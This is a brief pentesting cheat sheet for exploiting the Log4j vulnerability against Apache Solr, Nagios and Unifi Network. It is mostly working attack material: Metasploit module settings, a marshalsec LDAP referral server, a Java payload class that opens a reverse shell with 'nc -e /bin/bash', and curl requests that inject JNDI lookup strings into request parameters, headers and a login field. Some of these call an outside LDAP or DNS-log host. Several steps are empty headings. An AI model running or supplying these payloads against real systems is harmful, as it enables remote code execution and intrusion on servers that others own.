Log4j Pentesting
Log4j has zero-day vulnerabilities to Log4Shell, Log4Unifi.
msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell
Exploit Apache Solr (JNDI)
You need to prepare your four local terminals.
1. Start LDAP Server on Your Local Terminal 1
- Install Maven
-
Get the Payload
Download the repository.
Then build the marshalsec utility
- Start LDAP Server
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"
2. Host the Exploit on Your Local Terminal 2
-
Create the Exploit with Java
First, create a new directory and create a new exploit named "Exploit.java" in the directory.
Open your favorite editor like vim.
In editor, enter the following code.
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
} catch (Exception e) {
e.printStackTrace();
}
}
}
- Compile the Payload
- Start Web Server to Host the Payload
3. Open Listener on Your Local Terminal 3
4. Send Request the Target Website
# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'
# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'
Exploit Unifi Network using Log4Unifi
Log4Unifi is an exploitation Log4j tool in Unifi Network.
1. Test the Vulnerability in the Target Web Page
curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'
2. Open Listener on Your Local Machine
3. Exploit
Download the exploit from the repository.
Exploit